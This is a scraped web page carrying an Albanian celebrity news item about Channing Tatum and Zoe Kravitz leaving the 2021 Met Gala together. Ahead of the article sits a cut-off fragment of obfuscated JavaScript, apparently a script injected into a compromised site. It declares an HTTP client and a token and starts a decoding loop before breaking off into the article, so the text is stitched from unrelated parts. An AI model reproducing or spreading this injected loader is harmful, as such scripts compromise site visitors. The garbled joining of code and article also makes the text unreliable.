;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Aktorët amerikanë konfirmojnë lidhjen e tyre

By

Aktori amerikan Channing Tatum ndau foton e tij të parë me të dashurën e përfolur Zoe Kravitz nga festa e Alicia Keys pas mbrëmjes së ‘Met Gala’.

Një fotografi e përbashkët e dyshes konfirmoi dyshimet e lidhjes së tyre.

Tatum dhe Kravitz u larguan nga “Met Gala 2021” dorë për dore për të vazhduar në festën e Keys.

Dyshja kishin zgjedhur të ecnin në tapetin e kuq veç e veç në fillim të natës, por orë më vonë ata ishin shumë së bashku kur u larguan nga hoteli Bowery në New York.

Çifti kanë qenë subjekt i thashethemeve për romancë gjatë javëve të fundit, ndërsa ata vazhdojnë të kalojnë shumë kohë së bashku në NYC.

Çifti i ri më i nxehtë i Hollivudit nuk kanë komentuar lidhjen e tyre, por ata janë parë së bashku në shumë raste.

Një burim i tha revistës “People” se ata “vazhdojnë të jenë të pandashëm” dhe se ata kanë “kimi të lezetshme dhe flirtuese”.

“Zoe mendon se Channing ka thellësi si aktor dhe si person dhe Channing i pëlqen që ajo është e pavarur dhe e hapur, si dhe e ndritshme”.

Artikuj të ngjashëm